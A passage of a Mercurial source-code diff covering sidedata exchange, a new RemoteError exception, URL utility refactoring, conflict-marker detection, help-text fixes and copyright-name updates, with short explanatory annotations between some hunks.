+ # TODO: figure out if this should be bytes or str
+ # _type: (int, str, str, bytes) -> None
IOError.__init__(self, errno, strerror, filename)
self.desc = desc
@@ -455,6 +492,7 @@
"""Raised if a mercurial (core or extension) developer made a mistake"""
def __init__(self, msg, *args, **kwargs):
+ # type: (AnyStr, Any, Any) -> None
# On Python 3, turn the message back into a string since this is
# an internal-only error that won't be printed except in a
# stack traces.
@@ -498,7 +536,7 @@
entries.append(b"%s=%r" % (par, pycompat.maybebytestr(val)))
if entries:
msg = b'%s - %s' % (msg, b', '.join(entries))
- ValueError.__init__(self, msg)
+ ValueError.__init__(self, msg) # TODO: convert to str?
class ReadOnlyPartError(RuntimeError):
@@ -532,6 +570,7 @@
"""
def __init__(self, filename, node, tombstone):
+ # type: (bytes, bytes, bytes) -> None
from .node import short
StorageError.__init__(self, b'%s:%s' % (filename, short(node)))
@@ -587,5 +626,6 @@
"""
def __init__(self, message, args=None):
+ # type: (bytes, Optional[Sequence[bytes]]) -> None
self.message = message
self.messageargs = args
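The new `RemoteError` class slots between `Abort` and `OutOfBandError`, so
failures reported by the other side of an exchange can be caught (and
exit-coded) uniformly. A small illustration built only from what this hunk
defines::

    from mercurial import error

    assert issubclass(error.OutOfBandError, error.RemoteError)
    assert issubclass(error.RemoteError, error.Abort)

    try:
        # OutOfBandError now prefixes its message with "remote error:".
        raise error.OutOfBandError(b'server rejected the bundle')
    except error.RemoteError as exc:
        # Abort.format() renders:
        #   b'abort: remote error:\nserver rejected the bundle\n'
        formatted = exc.format()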
--- a/mercurial/exchange.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/exchange.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# exchange.py - utility to exchange data between repos.
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -42,6 +42,7 @@
from .utils import (
hashutil,
stringutil,
+ urlutil,
)
urlerr = util.urlerr
@@ -420,7 +421,20 @@
b'unbundle wire protocol command'
)
)
-
+ for category in sorted(bundle2.read_remote_wanted_sidedata(pushop.remote)):
+ # Check that a computer is registered for that category for at least
+ # one revlog kind.
+ for kind, computers in repo._sidedata_computers.items():
+ if computers.get(category):
+ break
+ else:
+ raise error.Abort(
+ _(
+ b'cannot push: required sidedata category not supported'
+ b" by this client: '%s'"
+ )
+ % pycompat.bytestr(category)
+ )
# get lock as we might write phase data
wlock = lock = None
try:
@@ -814,7 +828,7 @@
data = []
for book, old, new in pushop.outbookmarks:
data.append((book, old))
- checkdata = bookmod.binaryencode(data)
+ checkdata = bookmod.binaryencode(pushop.repo, data)
bundler.newpart(b'check:bookmarks', data=checkdata)
@@ -865,8 +879,15 @@
if not cgversions:
raise error.Abort(_(b'no common changegroup version'))
version = max(cgversions)
+
+ remote_sidedata = bundle2.read_remote_wanted_sidedata(pushop.remote)
cgstream = changegroup.makestream(
- pushop.repo, pushop.outgoing, version, b'push'
+ pushop.repo,
+ pushop.outgoing,
+ version,
+ b'push',
+ bundlecaps=b2caps,
+ remote_sidedata=remote_sidedata,
)
cgpart = bundler.newpart(b'changegroup', data=cgstream)
if cgversions:
@@ -1007,7 +1028,7 @@
_abortonsecretctx(pushop, new, book)
data.append((book, new))
allactions.append((book, _bmaction(old, new)))
- checkdata = bookmod.binaryencode(data)
+ checkdata = bookmod.binaryencode(pushop.repo, data)
bundler.newpart(b'bookmarks', data=checkdata)
def handlereply(op):
@@ -1126,19 +1147,19 @@
},
).result()
except error.BundleValueError as exc:
- raise error.Abort(_(b'missing support for %s') % exc)
+ raise error.RemoteError(_(b'missing support for %s') % exc)
try:
trgetter = None
if pushback:
trgetter = pushop.trmanager.transaction
op = bundle2.processbundle(pushop.repo, reply, trgetter)
except error.BundleValueError as exc:
- raise error.Abort(_(b'missing support for %s') % exc)
+ raise error.RemoteError(_(b'missing support for %s') % exc)
except bundle2.AbortFromPart as exc:
- pushop.ui.status(_(b'remote: %s\n') % exc)
+ pushop.ui.error(_(b'remote: %s\n') % exc)
if exc.hint is not None:
- pushop.ui.status(_(b'remote: %s\n') % (b'(%s)' % exc.hint))
- raise error.Abort(_(b'push failed on remote'))
+ pushop.ui.error(_(b'remote: %s\n') % (b'(%s)' % exc.hint))
+ raise error.RemoteError(_(b'push failed on remote'))
except error.PushkeyFailed as exc:
partid = int(exc.partid)
if partid not in pushop.pkfailcb:
@@ -1445,7 +1466,7 @@
def transaction(self):
"""Return an open transaction object, constructing if necessary"""
if not self._tr:
- trname = b'%s\n%s' % (self.source, util.hidepassword(self.url))
+ trname = b'%s\n%s' % (self.source, urlutil.hidepassword(self.url))
self._tr = self.repo.transaction(trname)
self._tr.hookargs[b'source'] = self.source
self._tr.hookargs[b'url'] = self.url
@@ -1607,6 +1628,23 @@
) % (b', '.join(sorted(missing)))
raise error.Abort(msg)
+ for category in repo._wanted_sidedata:
+ # Check that a computer is registered for that category for at least
+ # one revlog kind.
+ for kind, computers in repo._sidedata_computers.items():
+ if computers.get(category):
+ break
+ else:
+ # This should never happen since repos are supposed to be able to
+ # generate the sidedata they require.
+ raise error.ProgrammingError(
+ _(
+ b'sidedata category requested by local side without local'
+ b"support: '%s'"
+ )
+ % pycompat.bytestr(category)
+ )
+
pullop.trmanager = transactionmanager(repo, b'pull', remote.url())
wlock = util.nullcontextmanager()
if not bookmod.bookmarksinstore(repo):
@@ -1820,6 +1858,10 @@
pullop.stepsdone.add(b'obsmarkers')
_pullbundle2extraprepare(pullop, kwargs)
+ remote_sidedata = bundle2.read_remote_wanted_sidedata(pullop.remote)
+ if remote_sidedata:
+ kwargs[b'remote_sidedata'] = remote_sidedata
+
with pullop.remote.commandexecutor() as e:
args = dict(kwargs)
args[b'source'] = b'pull'
@@ -1832,10 +1874,10 @@
op.modes[b'bookmarks'] = b'records'
bundle2.processbundle(pullop.repo, bundle, op=op)
except bundle2.AbortFromPart as exc:
- pullop.repo.ui.status(_(b'remote: abort: %s\n') % exc)
- raise error.Abort(_(b'pull failed on remote'), hint=exc.hint)
+ pullop.repo.ui.error(_(b'remote: abort: %s\n') % exc)
+ raise error.RemoteError(_(b'pull failed on remote'), hint=exc.hint)
except error.BundleValueError as exc:
- raise error.Abort(_(b'missing support for %s') % exc)
+ raise error.RemoteError(_(b'missing support for %s') % exc)
if pullop.fetch:
pullop.cgresult = bundle2.combinechangegroupresults(op)
@@ -2249,7 +2291,13 @@
def getbundlechunks(
- repo, source, heads=None, common=None, bundlecaps=None, **kwargs
+ repo,
+ source,
+ heads=None,
+ common=None,
+ bundlecaps=None,
+ remote_sidedata=None,
+ **kwargs
):
"""Return chunks constituting a bundle's raw data.
@@ -2279,7 +2327,12 @@
return (
info,
changegroup.makestream(
- repo, outgoing, b'01', source, bundlecaps=bundlecaps
+ repo,
+ outgoing,
+ b'01',
+ source,
+ bundlecaps=bundlecaps,
+ remote_sidedata=remote_sidedata,
),
)
@@ -2303,6 +2356,7 @@
source,
bundlecaps=bundlecaps,
b2caps=b2caps,
+ remote_sidedata=remote_sidedata,
**pycompat.strkwargs(kwargs)
)
@@ -2325,6 +2379,7 @@
b2caps=None,
heads=None,
common=None,
+ remote_sidedata=None,
**kwargs
):
"""add a changegroup part to the requested bundle"""
@@ -2355,7 +2410,13 @@
matcher = None
cgstream = changegroup.makestream(
- repo, outgoing, version, source, bundlecaps=bundlecaps, matcher=matcher
+ repo,
+ outgoing,
+ version,
+ source,
+ bundlecaps=bundlecaps,
+ matcher=matcher,
+ remote_sidedata=remote_sidedata,
)
part = bundler.newpart(b'changegroup', data=cgstream)
@@ -2369,6 +2430,8 @@
if b'exp-sidedata-flag' in repo.requirements:
part.addparam(b'exp-sidedata', b'1')
+ sidedata = bundle2.format_remote_wanted_sidedata(repo)
+ part.addparam(b'exp-wanted-sidedata', sidedata)
if (
kwargs.get('narrow', False)
@@ -2393,7 +2456,7 @@
if not b2caps or b'bookmarks' not in b2caps:
raise error.Abort(_(b'no common bookmarks exchange method'))
books = bookmod.listbinbookmarks(repo)
- data = bookmod.binaryencode(books)
+ data = bookmod.binaryencode(repo, books)
if data:
bundler.newpart(b'bookmarks', data=data)
@@ -2585,7 +2648,7 @@
# push can proceed
if not isinstance(cg, bundle2.unbundle20):
# legacy case: bundle1 (changegroup 01)
- txnname = b"\n".join([source, util.hidepassword(url)])
+ txnname = b"\n".join([source, urlutil.hidepassword(url)])
with repo.lock(), repo.transaction(txnname) as tr:
op = bundle2.applybundle(repo, cg, tr, source, url)
r = bundle2.combinechangegroupresults(op)
--- a/mercurial/exchangev2.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/exchangev2.py Tue Apr 20 11:01:06 2021 -0400
@@ -22,6 +22,7 @@
narrowspec,
phases,
pycompat,
+ requirements as requirementsmod,
setdiscovery,
)
from .interfaces import repository
@@ -183,7 +184,7 @@
# TODO This is super hacky. There needs to be a storage API for this. We
# also need to check for compatibility with the remote.
- if b'revlogv1' not in repo.requirements:
+ if requirementsmod.REVLOGV1_REQUIREMENT not in repo.requirements:
return False
return True
@@ -358,18 +359,20 @@
# Linkrev for changelog is always self.
return len(cl)
- def ondupchangeset(cl, node):
- added.append(node)
+ def ondupchangeset(cl, rev):
+ added.append(cl.node(rev))
- def onchangeset(cl, node):
+ def onchangeset(cl, rev):
progress.increment()
- revision = cl.changelogrevision(node)
- added.append(node)
+ revision = cl.changelogrevision(rev)
+ added.append(cl.node(rev))
# We need to preserve the mapping of changelog revision to node
# so we can set the linkrev accordingly when manifests are added.
- manifestnodes[cl.rev(node)] = revision.manifest
+ manifestnodes[rev] = revision.manifest
+
+ repo.register_changeset(rev, revision)
nodesbyphase = {phase: set() for phase in phases.phasenames.values()}
remotebookmarks = {}
@@ -414,12 +417,15 @@
mdiff.trivialdiffheader(len(data)) + data,
# Flags not yet supported.
0,
+ # Sidedata not yet supported.
+ {},
)
cl.addgroup(
iterrevisions(),
linkrev,
weakref.proxy(tr),
+ alwayscache=True,
addrevisioncb=onchangeset,
duplicaterevisioncb=ondupchangeset,
)
@@ -492,6 +498,8 @@
delta,
# Flags not yet supported.
0,
+ # Sidedata not yet supported.
+ {},
)
progress.increment()
@@ -533,8 +541,8 @@
# Chomp off header object.
next(objs)
- def onchangeset(cl, node):
- added.append(node)
+ def onchangeset(cl, rev):
+ added.append(cl.node(rev))
rootmanifest.addgroup(
iterrevisions(objs, progress),
@@ -617,6 +625,8 @@
delta,
# Flags not yet supported.
0,
+ # Sidedata not yet supported.
+ {},
)
progress.increment()
@@ -715,6 +725,8 @@
delta,
# Flags not yet supported.
0,
+ # Sidedata not yet supported.
+ {},
)
progress.increment()
--- a/mercurial/extensions.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/extensions.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# extensions.py - extension handling for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/exthelper.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/exthelper.py Tue Apr 20 11:01:06 2021 -0400
@@ -46,13 +46,22 @@
# ext.py
eh = exthelper.exthelper()
- # As needed:
+ # As needed (failure to do this will mean your registration will not
+ # happen):
cmdtable = eh.cmdtable
configtable = eh.configtable
filesetpredicate = eh.filesetpredicate
revsetpredicate = eh.revsetpredicate
templatekeyword = eh.templatekeyword
+ # As needed (failure to do this will mean your eh.wrap*-decorated
+ # functions will not wrap, and/or your eh.*setup-decorated functions
+ # will not execute):
+ uisetup = eh.finaluisetup
+ extsetup = eh.finalextsetup
+ reposetup = eh.finalreposetup
+ uipopulate = eh.finaluipopulate
+
@eh.command(b'mynewcommand',
[(b'r', b'rev', [], _(b'operate on these revisions'))],
_(b'-r REV...'),
@@ -155,7 +164,7 @@
c(ui)
def finalextsetup(self, ui):
- """Method to be used as a the extension extsetup
+ """Method to be used as the extension extsetup
The following operations belong here:
@@ -201,6 +210,9 @@
example::
+ # Required, otherwise your uisetup function(s) will not execute.
+ uisetup = eh.finaluisetup
+
@eh.uisetup
def setupbabar(ui):
print('this is uisetup!')
@@ -213,6 +225,9 @@
example::
+ # Required, otherwise your uipopulate function(s) will not execute.
+ uipopulate = eh.finaluipopulate
+
@eh.uipopulate
def setupfoo(ui):
print('this is uipopulate!')
@@ -225,6 +240,9 @@
example::
+ # Required, otherwise your extsetup function(s) will not execute.
+ extsetup = eh.finalextsetup
+
@eh.extsetup
def setupcelestine(ui):
print('this is extsetup!')
@@ -237,6 +255,9 @@
example::
+ # Required, otherwise your reposetup function(s) will not execute.
+ reposetup = eh.finalreposetup
+
@eh.reposetup
def setupzephir(ui, repo):
print('this is reposetup!')
@@ -258,6 +279,11 @@
example::
+ # Required if `extension` is not provided
+ uisetup = eh.finaluisetup
+ # Required if `extension` is provided
+ extsetup = eh.finalextsetup
+
@eh.wrapcommand(b'summary')
def wrapsummary(orig, ui, repo, *args, **kwargs):
ui.note(b'Barry!')
@@ -298,8 +324,11 @@
example::
- @eh.function(discovery, b'checkheads')
- def wrapfunction(orig, *args, **kwargs):
+ # Required, otherwise the function will not be wrapped
+ uisetup = eh.finaluisetup
+
+ @eh.wrapfunction(discovery, b'checkheads')
+ def wrapcheckheads(orig, *args, **kwargs):
ui.note(b'His head smashed in and his heart cut out')
return orig(*args, **kwargs)
"""
--- a/mercurial/fancyopts.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/fancyopts.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# fancyopts.py - better command line parsing
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/filelog.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/filelog.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# filelog.py - file history class for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -32,6 +32,8 @@
# Full name of the user visible file, relative to the repository root.
# Used by LFS.
self._revlog.filename = path
+ self._revlog.revlog_kind = b'filelog'
+ self.nullid = self._revlog.nullid
def __len__(self):
return len(self._revlog)
@@ -102,6 +104,7 @@
revisiondata=False,
assumehaveparentrevisions=False,
deltamode=repository.CG_DELTAMODE_STD,
+ sidedata_helpers=None,
):
return self._revlog.emitrevisions(
nodes,
@@ -109,6 +112,7 @@
revisiondata=revisiondata,
assumehaveparentrevisions=assumehaveparentrevisions,
deltamode=deltamode,
+ sidedata_helpers=sidedata_helpers,
)
def addrevision(
@@ -176,7 +180,8 @@
def add(self, text, meta, transaction, link, p1=None, p2=None):
if meta or text.startswith(b'\1\n'):
text = storageutil.packmeta(meta, text)
- return self.addrevision(text, transaction, link, p1, p2)
+ rev = self.addrevision(text, transaction, link, p1, p2)
+ return self.node(rev)
def renamed(self, node):
return storageutil.filerevisioncopied(self, node)
--- a/mercurial/filemerge.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/filemerge.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# filemerge.py - file-level merge handling for Mercurial
#
-# Copyright 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -538,6 +538,25 @@
@internaltool(
+ b'merge3-lie-about-conflicts',
+ fullmerge,
+ b'',
+ precheck=_mergecheck,
+)
+def _imerge3alwaysgood(*args, **kwargs):
+ # Like merge3, but record conflicts as resolved with markers in place.
+ #
+ # This is used for `diff.merge` to show the differences between
+ # the auto-merge state and the committed merge state. It may be
+ # useful for other things.
+ b1, junk, b2 = _imerge3(*args, **kwargs)
+ # TODO is this right? I'm not sure what these return values mean,
+ # but as far as I can tell this will indicate to callers that the
+ # merge succeeded.
+ return b1, False, b2
+
+
+@internaltool(
b'mergediff',
fullmerge,
_(
@@ -1195,7 +1214,11 @@
def hasconflictmarkers(data):
return bool(
- re.search(b"^(<<<<<<< .*|=======|>>>>>>> .*)$", data, re.MULTILINE)
+ re.search(
+ br"^(<<<<<<<.*|=======.*|------- .*|\+\+\+\+\+\+\+ .*|>>>>>>>.*)$",
+ data,
+ re.MULTILINE,
+ )
)
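The broadened pattern above recognizes the `-------` / `+++++++` marker lines
produced by the mergediff marker style in addition to the classic markers. A
quick self-contained check of both forms::

    import re

    pattern = br"^(<<<<<<<.*|=======.*|------- .*|\+\+\+\+\+\+\+ .*|>>>>>>>.*)$"
    classic = b"<<<<<<< local\nx\n=======\ny\n>>>>>>> other\n"
    mergediff = b"<<<<<<<\nbase\n------- base\n+++++++ local\ny\n>>>>>>>\n"
    assert re.search(pattern, classic, re.MULTILINE)
    assert re.search(pattern, mergediff, re.MULTILINE)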
--- a/mercurial/fileset.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/fileset.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# fileset.py - file set queries for mercurial
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/filesetlang.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/filesetlang.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# filesetlang.py - parser, tokenizer and utility for file set language
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/formatter.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/formatter.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# formatter.py - generic output formatting for mercurial
#
-# Copyright 2012 Matt Mackall <mpm@selenic.com>
+# Copyright 2012 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -178,6 +178,11 @@
class baseformatter(object):
+
+ # set to True if the formatter outputs a strict format that does not
+ # support arbitrary output in the stream.
+ strict_format = False
+
def __init__(self, ui, topic, opts, converter):
self._ui = ui
self._topic = topic
@@ -418,6 +423,9 @@
class jsonformatter(baseformatter):
+
+ strict_format = True
+
def __init__(self, ui, out, topic, opts):
baseformatter.__init__(self, ui, topic, opts, _nullconverter)
self._out = out
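The `strict_format` flag added here is what the debugdiscovery hunk earlier
in this patch keys on: when the selected formatter produces a strict stream
(currently only JSON), free-form ui output is buffered and recorded as a data
field instead of corrupting the stream. A condensed sketch of that calling
pattern, assuming a `ui` object and an `opts` dict::

    import contextlib
    from mercurial import util

    fm = ui.formatter(b'example', opts)
    data = {}
    if fm.strict_format:  # True for jsonformatter

        @contextlib.contextmanager
        def may_capture_output():
            ui.pushbuffer()
            yield
            data[b'output'] = ui.popbuffer()

    else:
        may_capture_output = util.nullcontextmanager

    with may_capture_output():
        # reaches the terminal directly only in the non-strict case
        ui.write(b'free-form status output\n')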
--- a/mercurial/grep.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/grep.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# grep.py - logic for history walk and grep
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hbisect.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hbisect.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# changelog bisection for mercurial
#
-# Copyright 2007 Matt Mackall
+# Copyright 2007 Olivia Mackall
# Copyright 2005, 2006 Benoit Boissinot <benoit.boissinot@ens-lyon.org>
#
# Inspired by git bisect, extension skeleton taken from mq.py.
--- a/mercurial/help.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/help.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# help.py - help data for mercurial
#
-# Copyright 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -829,10 +829,11 @@
def appendcmds(cmds):
cmds = sorted(cmds)
for c in cmds:
+ display_cmd = c
if ui.verbose:
- rst.append(b" :%s: %s\n" % (b', '.join(syns[c]), h[c]))
- else:
- rst.append(b' :%s: %s\n' % (c, h[c]))
+ display_cmd = b', '.join(syns[c])
+ display_cmd = display_cmd.replace(b':', br'\:')
+ rst.append(b' :%s: %s\n' % (display_cmd, h[c]))
if name in (b'shortlist', b'debug'):
# List without categories.
--- a/mercurial/helptext/config.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/helptext/config.txt Tue Apr 20 11:01:06 2021 -0400
@@ -910,7 +910,8 @@
Repository with this on-disk format require Mercurial version 5.4 or above.
- Disabled by default.
+ By default, this format variant is enabled if the fast implementation is
+ available and disabled otherwise.
``use-share-safe``
Enforce "safe" behaviors for all "shares" that access this repository.
@@ -966,7 +967,7 @@
On some systems, the Mercurial installation may lack `zstd` support.
- Default is `zlib`.
+ Default is `zstd` if available, `zlib` otherwise.
``bookmarks-in-store``
Store bookmarks in .hg/store/. This means that bookmarks are shared when
@@ -1150,7 +1151,7 @@
``pretxnopen``
Run before any new repository transaction is open. The reason for the
transaction will be in ``$HG_TXNNAME``, and a unique identifier for the
- transaction will be in ``HG_TXNID``. A non-zero status will prevent the
+ transaction will be in ``$HG_TXNID``. A non-zero status will prevent the
transaction from being opened.
``pretxnclose``
@@ -1159,12 +1160,13 @@
content or change it. Exit status 0 allows the commit to proceed. A non-zero
status will cause the transaction to be rolled back. The reason for the
transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for
- the transaction will be in ``HG_TXNID``. The rest of the available data will
- vary according the transaction type. New changesets will add ``$HG_NODE``
- (the ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last
- added changeset), ``$HG_URL`` and ``$HG_SOURCE`` variables. Bookmark and
- phase changes will set ``HG_BOOKMARK_MOVED`` and ``HG_PHASES_MOVED`` to ``1``
- respectively, etc.
+ the transaction will be in ``$HG_TXNID``. The rest of the available data will
+ vary according to the transaction type. Changes unbundled to the repository will
+ add ``$HG_URL`` and ``$HG_SOURCE``. New changesets will add ``$HG_NODE`` (the
+ ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last added
+ changeset). Bookmark and phase changes will set ``$HG_BOOKMARK_MOVED`` and
+ ``$HG_PHASES_MOVED`` to ``1`` respectively. The number of new obsmarkers, if
+ any, will be in ``$HG_NEW_OBSMARKERS``, etc.
``pretxnclose-bookmark``
Run right before a bookmark change is actually finalized. Any repository
@@ -1178,7 +1180,7 @@
will be empty.
In addition, the reason for the transaction opening will be in
``$HG_TXNNAME``, and a unique identifier for the transaction will be in
- ``HG_TXNID``.
+ ``$HG_TXNID``.
``pretxnclose-phase``
Run right before a phase change is actually finalized. Any repository change
@@ -1190,7 +1192,7 @@
while the previous ``$HG_OLDPHASE``. In case of new node, ``$HG_OLDPHASE``
will be empty. In addition, the reason for the transaction opening will be in
``$HG_TXNNAME``, and a unique identifier for the transaction will be in
- ``HG_TXNID``. The hook is also run for newly added revisions. In this case
+ ``$HG_TXNID``. The hook is also run for newly added revisions. In this case
the ``$HG_OLDPHASE`` entry will be empty.
``txnclose``
@@ -1701,7 +1703,8 @@
These symbolic names can be used from the command line. To pull
from ``my_server``: :hg:`pull my_server`. To push to ``local_path``:
-:hg:`push local_path`.
+:hg:`push local_path`. You can check :hg:`help urls` for details about
+valid URLs.
Options containing colons (``:``) denote sub-options that can influence
behavior for that specific path. Example::
@@ -1710,6 +1713,9 @@
my_server = https://example.com/my_path
my_server:pushurl = ssh://example.com/my_path
+Paths using the `path://otherpath` scheme will inherit the sub-option values
+from the path they point to.
+
The following sub-options can be defined:
``pushurl``
--- a/mercurial/helptext/hg-ssh.8.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/helptext/hg-ssh.8.txt Tue Apr 20 11:01:06 2021 -0400
@@ -52,7 +52,7 @@
Author
""""""
-Written by Matt Mackall <mpm@selenic.com>
+Written by Olivia Mackall <olivia@selenic.com>
Resources
"""""""""
@@ -64,7 +64,7 @@
Copying
"""""""
-Copyright (C) 2005-2016 Matt Mackall.
+Copyright (C) 2005-2016 Olivia Mackall.
Free use of this software is granted under the terms of the GNU General
Public License version 2 or any later version.
--- a/mercurial/helptext/hg.1.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/helptext/hg.1.txt Tue Apr 20 11:01:06 2021 -0400
@@ -6,7 +6,7 @@
Mercurial source code management system
---------------------------------------
-:Author: Matt Mackall <mpm@selenic.com>
+:Author: Olivia Mackall <olivia@selenic.com>
:Organization: Mercurial
:Manual section: 1
:Manual group: Mercurial Manual
@@ -100,7 +100,7 @@
Author
""""""
-Written by Matt Mackall <mpm@selenic.com>
+Written by Olivia Mackall <olivia@selenic.com>
Resources
"""""""""
@@ -112,7 +112,7 @@
Copying
"""""""
-Copyright (C) 2005-2021 Matt Mackall.
+Copyright (C) 2005-2021 Olivia Mackall.
Free use of this software is granted under the terms of the GNU General
Public License version 2 or any later version.
--- a/mercurial/helptext/hgignore.5.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/helptext/hgignore.5.txt Tue Apr 20 11:01:06 2021 -0400
@@ -17,7 +17,7 @@
======
Vadim Gelfer <vadim.gelfer@gmail.com>
-Mercurial was written by Matt Mackall <mpm@selenic.com>.
+Mercurial was written by Olivia Mackall <olivia@selenic.com>.
See Also
========
@@ -26,7 +26,7 @@
Copying
=======
This manual page is copyright 2006 Vadim Gelfer.
-Mercurial is copyright 2005-2021 Matt Mackall.
+Mercurial is copyright 2005-2021 Olivia Mackall.
Free use of this software is granted under the terms of the GNU General
Public License version 2 or any later version.
--- a/mercurial/helptext/hgrc.5.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/helptext/hgrc.5.txt Tue Apr 20 11:01:06 2021 -0400
@@ -25,7 +25,7 @@
======
Bryan O'Sullivan <bos@serpentine.com>.
-Mercurial was written by Matt Mackall <mpm@selenic.com>.
+Mercurial was written by Olivia Mackall <olivia@selenic.com>.
See Also
========
@@ -34,7 +34,7 @@
Copying
=======
This manual page is copyright 2005 Bryan O'Sullivan.
-Mercurial is copyright 2005-2021 Matt Mackall.
+Mercurial is copyright 2005-2021 Olivia Mackall.
Free use of this software is granted under the terms of the GNU General
Public License version 2 or any later version.
--- a/mercurial/helptext/urls.txt Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/helptext/urls.txt Tue Apr 20 11:01:06 2021 -0400
@@ -5,6 +5,7 @@
http://[user[:pass]@]host[:port]/[path][#revision]
https://[user[:pass]@]host[:port]/[path][#revision]
ssh://[user@]host[:port]/[path][#revision]
+ path://pathname
Paths in the local filesystem can either point to Mercurial
repositories or to bundle files (as created by :hg:`bundle` or
@@ -64,3 +65,12 @@
default-push:
The push command will look for a path named 'default-push', and
prefer it over 'default' if both are defined.
+
+These aliases can also be used in the `path://` scheme::
+
+ [paths]
+ alias1 = URL1
+ alias2 = path://alias1
+ ...
+
+Check :hg:`help config.paths` for details about the behavior of such "sub-paths".
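Combined with the sub-option inheritance documented in the config help above,
a `path://` alias also picks up sub-options such as `pushurl` from the path
it points to (the values below are illustrative)::

    [paths]
    my_server = https://example.com/my_path
    my_server:pushurl = ssh://example.com/my_path
    # also_my_server resolves to my_server's URL and inherits its pushurl.
    also_my_server = path://my_server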
--- a/mercurial/hg.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hg.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# hg.py - repository classes for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
@@ -32,6 +32,7 @@
error,
exchange,
extensions,
+ graphmod,
httppeer,
localrepo,
lock,
@@ -55,6 +56,7 @@
from .utils import (
hashutil,
stringutil,
+ urlutil,
)
@@ -65,7 +67,7 @@
def _local(path):
- path = util.expandpath(util.urllocalpath(path))
+ path = util.expandpath(urlutil.urllocalpath(path))
try:
# we use os.stat() directly here instead of os.path.isfile()
@@ -131,13 +133,9 @@
def parseurl(path, branches=None):
'''parse url#branch, returning (url, (branch, branches))'''
-
- u = util.url(path)
- branch = None
- if u.fragment:
- branch = u.fragment
- u.fragment = None
- return bytes(u), (branch, branches or [])
+ msg = b'parseurl(...) moved to mercurial.utils.urlutil'
+ util.nouideprecwarn(msg, b'6.0', stacklevel=2)
+ return urlutil.parseurl(path, branches=branches)
schemes = {
@@ -152,7 +150,7 @@
def _peerlookup(path):
- u = util.url(path)
+ u = urlutil.url(path)
scheme = u.scheme or b'file'
thing = schemes.get(scheme) or schemes[b'file']
try:
@@ -177,7 +175,7 @@
def openpath(ui, path, sendaccept=True):
'''open path with open if local, url.open if remote'''
